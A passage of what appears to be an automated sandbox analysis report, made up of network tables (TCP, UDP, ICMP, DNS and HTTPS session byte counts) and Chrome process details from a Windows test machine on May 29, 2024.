May 29, 2024 15:07:15.150183916 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:15.150228977 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:07:15.150578976 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:15.150650024 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:15.150722027 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:07:15.156269073 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:07:15.156291008 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:15.156301975 CEST | 49755 | 443 | 192.168.2.9 | 40.68.123.157 |
May 29, 2024 15:07:15.156308889 CEST | 443 | 49755 | 40.68.123.157 | 192.168.2.9 |
May 29, 2024 15:07:25.860166073 CEST | 49757 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:07:25.860203028 CEST | 443 | 49757 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:07:25.860291004 CEST | 49757 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:07:25.860579967 CEST | 49757 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:07:25.860593081 CEST | 443 | 49757 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:07:26.507246017 CEST | 443 | 49757 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:07:26.507935047 CEST | 49757 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:07:26.507949114 CEST | 443 | 49757 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:07:26.508405924 CEST | 443 | 49757 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:07:26.509291887 CEST | 49757 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:07:26.509387970 CEST | 443 | 49757 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:07:26.551386118 CEST | 49757 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:07:36.425506115 CEST | 443 | 49757 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:07:36.425607920 CEST | 443 | 49757 | 216.58.212.164 | 192.168.2.9 |
May 29, 2024 15:07:36.426063061 CEST | 49757 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:07:37.685771942 CEST | 49757 | 443 | 192.168.2.9 | 216.58.212.164 |
May 29, 2024 15:07:37.685795069 CEST | 443 | 49757 | 216.58.212.164 | 192.168.2.9 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 29, 2024 15:06:20.935337067 CEST | 53 | 63565 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:20.947650909 CEST | 53 | 63061 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:21.113944054 CEST | 64630 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:21.114152908 CEST | 59535 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:21.115032911 CEST | 64623 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:21.115156889 CEST | 52605 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:21.121376991 CEST | 53 | 59535 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:21.122133970 CEST | 53 | 64630 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:21.153412104 CEST | 53 | 52605 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:21.159126043 CEST | 53 | 64623 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:22.966775894 CEST | 53 | 55571 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:23.092199087 CEST | 51765 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:23.092427969 CEST | 64653 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:23.106255054 CEST | 53 | 51765 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:23.128107071 CEST | 53 | 64653 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:23.132009029 CEST | 51536 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:23.132122993 CEST | 56332 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:23.138778925 CEST | 53 | 51536 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:23.139033079 CEST | 53 | 56332 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:23.139842987 CEST | 53 | 54593 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:24.380793095 CEST | 53 | 65528 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:24.430677891 CEST | 60864 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:24.430928946 CEST | 54478 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:24.437522888 CEST | 53 | 60864 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:24.438924074 CEST | 53 | 54478 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:25.511038065 CEST | 55004 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:25.511194944 CEST | 50674 | 53 | 192.168.2.9 | 1.1.1.1 |
May 29, 2024 15:06:25.518562078 CEST | 53 | 55004 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:25.518631935 CEST | 53 | 50674 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:26.812594891 CEST | 53 | 58074 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:26.812952042 CEST | 53 | 56990 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:40.022993088 CEST | 53 | 64582 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:06:59.174408913 CEST | 53 | 55297 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:07:14.434092045 CEST | 138 | 138 | 192.168.2.9 | 192.168.2.255 |
May 29, 2024 15:07:20.985981941 CEST | 53 | 62018 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:07:22.275021076 CEST | 53 | 50709 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:07:48.995903015 CEST | 53 | 59359 | 1.1.1.1 | 192.168.2.9 |
May 29, 2024 15:08:35.213515043 CEST | 53 | 50195 | 1.1.1.1 | 192.168.2.9 |
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
May 29, 2024 15:06:23.128223896 CEST | 192.168.2.9 | 1.1.1.1 | c248 | (Port unreachable) | Destination Unreachable |
May 29, 2024 15:07:50.664382935 CEST | 192.168.2.9 | 1.1.1.1 | c238 | (Port unreachable) | Destination Unreachable |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
May 29, 2024 15:06:21.113944054 CEST | 192.168.2.9 | 1.1.1.1 | 0x73a0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
May 29, 2024 15:06:21.114152908 CEST | 192.168.2.9 | 1.1.1.1 | 0x4263 | Standard query (0) | 65 | IN (0x0001) | false | |
May 29, 2024 15:06:21.115032911 CEST | 192.168.2.9 | 1.1.1.1 | 0x84a4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
May 29, 2024 15:06:21.115156889 CEST | 192.168.2.9 | 1.1.1.1 | 0x7f30 | Standard query (0) | 65 | IN (0x0001) | false | |
May 29, 2024 15:06:23.092199087 CEST | 192.168.2.9 | 1.1.1.1 | 0xb6b8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
May 29, 2024 15:06:23.092427969 CEST | 192.168.2.9 | 1.1.1.1 | 0xec71 | Standard query (0) | 65 | IN (0x0001) | false | |
May 29, 2024 15:06:23.132009029 CEST | 192.168.2.9 | 1.1.1.1 | 0xcf65 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
May 29, 2024 15:06:23.132122993 CEST | 192.168.2.9 | 1.1.1.1 | 0xe940 | Standard query (0) | 65 | IN (0x0001) | false | |
May 29, 2024 15:06:24.430677891 CEST | 192.168.2.9 | 1.1.1.1 | 0x1f18 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
May 29, 2024 15:06:24.430928946 CEST | 192.168.2.9 | 1.1.1.1 | 0x36e8 | Standard query (0) | 65 | IN (0x0001) | false | |
May 29, 2024 15:06:25.511038065 CEST | 192.168.2.9 | 1.1.1.1 | 0x1a7a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
May 29, 2024 15:06:25.511194944 CEST | 192.168.2.9 | 1.1.1.1 | 0x69cb | Standard query (0) | 65 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
May 29, 2024 15:06:21.121376991 CEST | 1.1.1.1 | 192.168.2.9 | 0x4263 | No error (0) | d2vgu95hoyrpkh.cloudfront.net | CNAME (Canonical name) | IN (0x0001) | false | ||
May 29, 2024 15:06:21.122133970 CEST | 1.1.1.1 | 192.168.2.9 | 0x73a0 | No error (0) | d2vgu95hoyrpkh.cloudfront.net | CNAME (Canonical name) | IN (0x0001) | false | ||
May 29, 2024 15:06:21.122133970 CEST | 1.1.1.1 | 192.168.2.9 | 0x73a0 | No error (0) | 52.85.49.85 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:21.122133970 CEST | 1.1.1.1 | 192.168.2.9 | 0x73a0 | No error (0) | 52.85.49.60 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:21.122133970 CEST | 1.1.1.1 | 192.168.2.9 | 0x73a0 | No error (0) | 52.85.49.53 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:21.122133970 CEST | 1.1.1.1 | 192.168.2.9 | 0x73a0 | No error (0) | 52.85.49.115 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:21.153412104 CEST | 1.1.1.1 | 192.168.2.9 | 0x7f30 | No error (0) | 65 | IN (0x0001) | false | |||
May 29, 2024 15:06:21.159126043 CEST | 1.1.1.1 | 192.168.2.9 | 0x84a4 | No error (0) | 104.21.84.200 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:21.159126043 CEST | 1.1.1.1 | 192.168.2.9 | 0x84a4 | No error (0) | 172.67.196.150 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:23.106255054 CEST | 1.1.1.1 | 192.168.2.9 | 0xb6b8 | No error (0) | cs837.wac.edgecastcdn.net | CNAME (Canonical name) | IN (0x0001) | false | ||
May 29, 2024 15:06:23.106255054 CEST | 1.1.1.1 | 192.168.2.9 | 0xb6b8 | No error (0) | 192.229.133.221 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:23.128107071 CEST | 1.1.1.1 | 192.168.2.9 | 0xec71 | No error (0) | cs837.wac.edgecastcdn.net | CNAME (Canonical name) | IN (0x0001) | false | ||
May 29, 2024 15:06:23.137732029 CEST | 1.1.1.1 | 192.168.2.9 | 0x60fd | No error (0) | s-part-0017.t-0009.t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
May 29, 2024 15:06:23.137732029 CEST | 1.1.1.1 | 192.168.2.9 | 0x60fd | No error (0) | 13.107.246.45 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:23.138778925 CEST | 1.1.1.1 | 192.168.2.9 | 0xcf65 | No error (0) | cs1100.wpc.omegacdn.net | CNAME (Canonical name) | IN (0x0001) | false | ||
May 29, 2024 15:06:23.138778925 CEST | 1.1.1.1 | 192.168.2.9 | 0xcf65 | No error (0) | 152.199.23.37 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:23.138926029 CEST | 1.1.1.1 | 192.168.2.9 | 0xeca7 | No error (0) | s-part-0017.t-0009.t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
May 29, 2024 15:06:23.138926029 CEST | 1.1.1.1 | 192.168.2.9 | 0xeca7 | No error (0) | 13.107.246.45 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:23.139033079 CEST | 1.1.1.1 | 192.168.2.9 | 0xe940 | No error (0) | cs1100.wpc.omegacdn.net | CNAME (Canonical name) | IN (0x0001) | false | ||
May 29, 2024 15:06:24.028870106 CEST | 1.1.1.1 | 192.168.2.9 | 0xffb0 | No error (0) | s-part-0017.t-0009.t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
May 29, 2024 15:06:24.028870106 CEST | 1.1.1.1 | 192.168.2.9 | 0xffb0 | No error (0) | 13.107.246.45 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:24.383294106 CEST | 1.1.1.1 | 192.168.2.9 | 0x95bf | No error (0) | s-part-0039.t-0009.t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
May 29, 2024 15:06:24.383294106 CEST | 1.1.1.1 | 192.168.2.9 | 0x95bf | No error (0) | 13.107.246.67 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:24.437522888 CEST | 1.1.1.1 | 192.168.2.9 | 0x1f18 | No error (0) | cs1100.wpc.omegacdn.net | CNAME (Canonical name) | IN (0x0001) | false | ||
May 29, 2024 15:06:24.437522888 CEST | 1.1.1.1 | 192.168.2.9 | 0x1f18 | No error (0) | 152.199.23.37 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:24.438924074 CEST | 1.1.1.1 | 192.168.2.9 | 0x36e8 | No error (0) | cs1100.wpc.omegacdn.net | CNAME (Canonical name) | IN (0x0001) | false | ||
May 29, 2024 15:06:25.518562078 CEST | 1.1.1.1 | 192.168.2.9 | 0x1a7a | No error (0) | 216.58.212.164 | A (IP address) | IN (0x0001) | false | ||
May 29, 2024 15:06:25.518631935 CEST | 1.1.1.1 | 192.168.2.9 | 0x69cb | No error (0) | 65 | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port |
---|---|---|---|---|
0 | 192.168.2.9 | 49705 | 34.117.186.192 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:12 UTC | 59 | OUT | |
2024-05-29 13:06:12 UTC | 513 | IN | |
2024-05-29 13:06:12 UTC | 321 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.9 | 49713 | 104.21.84.200 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:22 UTC | 492 | OUT | |
2024-05-29 13:06:22 UTC | 794 | IN | |
2024-05-29 13:06:22 UTC | 575 | IN | |
2024-05-29 13:06:22 UTC | 1369 | IN | |
2024-05-29 13:06:22 UTC | 1369 | IN | |
2024-05-29 13:06:22 UTC | 1369 | IN | |
2024-05-29 13:06:22 UTC | 1369 | IN | |
2024-05-29 13:06:22 UTC | 1369 | IN | |
2024-05-29 13:06:22 UTC | 1369 | IN | |
2024-05-29 13:06:22 UTC | 1369 | IN | |
2024-05-29 13:06:22 UTC | 1369 | IN | |
2024-05-29 13:06:22 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.9 | 49710 | 52.85.49.85 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:22 UTC | 510 | OUT | |
2024-05-29 13:06:22 UTC | 701 | IN | |
2024-05-29 13:06:22 UTC | 16384 | IN | |
2024-05-29 13:06:23 UTC | 16384 | IN | |
2024-05-29 13:06:23 UTC | 13038 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.9 | 49722 | 13.107.246.45 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:23 UTC | 616 | OUT | |
2024-05-29 13:06:24 UTC | 786 | IN | |
2024-05-29 13:06:24 UTC | 276 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.9 | 49718 | 13.107.246.45 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:23 UTC | 618 | OUT | |
2024-05-29 13:06:23 UTC | 806 | IN | |
2024-05-29 13:06:23 UTC | 1435 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.9 | 49717 | 13.107.246.45 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:23 UTC | 638 | OUT | |
2024-05-29 13:06:23 UTC | 785 | IN | |
2024-05-29 13:06:23 UTC | 2407 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.9 | 49719 | 13.107.246.45 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:23 UTC | 621 | OUT | |
2024-05-29 13:06:23 UTC | 805 | IN | |
2024-05-29 13:06:23 UTC | 199 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.9 | 49720 | 13.107.246.45 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:23 UTC | 617 | OUT | |
2024-05-29 13:06:23 UTC | 784 | IN | |
2024-05-29 13:06:23 UTC | 673 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.9 | 49716 | 192.229.133.221 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:23 UTC | 509 | OUT | |
2024-05-29 13:06:24 UTC | 510 | IN | |
2024-05-29 13:06:24 UTC | 16383 | IN | |
2024-05-29 13:06:24 UTC | 7044 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.9 | 49721 | 152.199.23.37 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:24 UTC | 624 | OUT | |
2024-05-29 13:06:24 UTC | 737 | IN | |
2024-05-29 13:06:24 UTC | 1636 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.9 | 49726 | 13.107.246.45 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:24 UTC | 418 | OUT | |
2024-05-29 13:06:24 UTC | 785 | IN | |
2024-05-29 13:06:24 UTC | 1435 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.9 | 49728 | 13.107.246.45 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:24 UTC | 438 | OUT | |
2024-05-29 13:06:24 UTC | 785 | IN | |
2024-05-29 13:06:24 UTC | 2407 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
12 | 192.168.2.9 | 49727 | 13.107.246.45 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:24 UTC | 421 | OUT | |
2024-05-29 13:06:24 UTC | 784 | IN | |
2024-05-29 13:06:24 UTC | 199 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
13 | 192.168.2.9 | 49729 | 13.107.246.45 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:24 UTC | 417 | OUT | |
2024-05-29 13:06:24 UTC | 784 | IN | |
2024-05-29 13:06:24 UTC | 673 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
14 | 192.168.2.9 | 49731 | 13.107.246.67 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:25 UTC | 416 | OUT | |
2024-05-29 13:06:25 UTC | 806 | IN | |
2024-05-29 13:06:25 UTC | 276 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
15 | 192.168.2.9 | 49732 | 152.199.23.37 | 443 | 7160 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:25 UTC | 424 | OUT | |
2024-05-29 13:06:25 UTC | 737 | IN | |
2024-05-29 13:06:25 UTC | 1636 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
16 | 192.168.2.9 | 49739 | 23.43.61.160 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:26 UTC | 161 | OUT | |
2024-05-29 13:06:27 UTC | 466 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
17 | 192.168.2.9 | 49741 | 184.28.90.27 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:28 UTC | 239 | OUT | |
2024-05-29 13:06:28 UTC | 514 | IN | |
2024-05-29 13:06:28 UTC | 55 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
18 | 192.168.2.9 | 49750 | 40.68.123.157 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:06:37 UTC | 306 | OUT | |
2024-05-29 13:06:37 UTC | 560 | IN | |
2024-05-29 13:06:37 UTC | 15824 | IN | |
2024-05-29 13:06:37 UTC | 8666 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
19 | 192.168.2.9 | 49755 | 40.68.123.157 | 443 |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-29 13:07:14 UTC | 306 | OUT | |
2024-05-29 13:07:15 UTC | 560 | IN | |
2024-05-29 13:07:15 UTC | 15824 | IN | |
2024-05-29 13:07:15 UTC | 9633 | IN |
Click to jump to process
Click to jump to process
Click to jump to process
Target ID: | 2 |
Start time: | 09:06:16 |
Start date: | 29/05/2024 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b2cb0000 |
File size: | 3'242'272 bytes |
MD5 hash: | 5BBFA6CBDF4C254EB368D534F9E23C92 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 09:06:19 |
Start date: | 29/05/2024 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6b2cb0000 |
File size: | 3'242'272 bytes |
MD5 hash: | 5BBFA6CBDF4C254EB368D534F9E23C92 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |